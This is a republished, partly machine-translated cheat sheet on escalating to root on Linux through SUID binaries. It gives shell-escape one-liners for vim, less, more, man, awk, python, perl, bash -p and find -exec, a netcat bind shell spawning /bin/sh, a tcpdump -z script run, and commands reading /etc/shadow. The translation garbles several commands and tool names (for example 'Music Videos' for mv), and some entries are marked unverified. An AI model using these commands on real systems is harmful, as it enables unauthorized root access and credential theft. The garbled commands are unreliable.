SUID Linux mention the right of privilege escalation

This article non-original, as a note to facilitate post queries, the original micro-channel public number of "black and white way" if infringement contact deleted

What is suid?

Popular understanding for the implementation of this program when other users can use this program to owner / group permissions.

Common commands can be used to mention the right of suid

Vim find Bash More Less  cp


chmod


ash/linux shell



awk 


MVC 

man

  python

 perl

tcpdump

查找suid文件

the Find / -perm -u = s The -type f 2> / dev / null 


/ representation from the top of the file system (root) to start and find each directory 
-perm express permission to search the following 
-u = s means the search owned by root file 
-type means that we are looking for the file type 
f represent regular files, not directories or special files 
2 for the second file descriptor of the process, namely stderr (standard error) 
> redirects 
/ dev / null is a special the file system object, it will drop to write all the contents.

 

Vim
Vim是Linux环境下的一款文件编辑器。但是，如果以SUID运行的话，它会继承root用户的权限，因此可以读取系统上的所有文件。

vim.tiny
# Press ESC key
:set shell=/bin/sh
:shell

 find

If the Find command is run in Suid permission to do so, then all commands will be executed by find execute with root privileges.

 

touch pentestlab
find pentestlab -exec whoami \;

 

 Most of the Linux operating system are installed netcat, it can also be used to elevate privileges to the root.

pentestlab -exec netcat -lVP the Find 5555 -e / bin / SH \; 
connections will go directly to the shell of a Root privileges.

netcat 192.168.1.189 5555
id
cat /etc/shadow

Bash

bash -p
bash-3.2# id
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

 More

 

more /home/pelle/myfile
!/bin/bash

 

 

Less

less /etc/passwd
!/bin/sh

 cp（暂未验证）

 

sudo sh -c 'cp $(which cp) .; chmod +s ./cp'

 

 chmod(暂未验证）

 

sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'

 

 ash/linux shell

 

sudo ash

 

 awk

awk 'BEGIN {system("/bin/bash")}'

 

Music Videos (temporarily Example No)

 

Use cover mv / etc / shadow or / etc / sudoers

 

  man

 

man passwd
!/bin/bash

 

 python

 

import os
os.system("/bin/bash")

 

 perl

 

exec "/bin/bash";

 

 ruby / lua / etc have similar

 

tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root

 

后续再找到再补充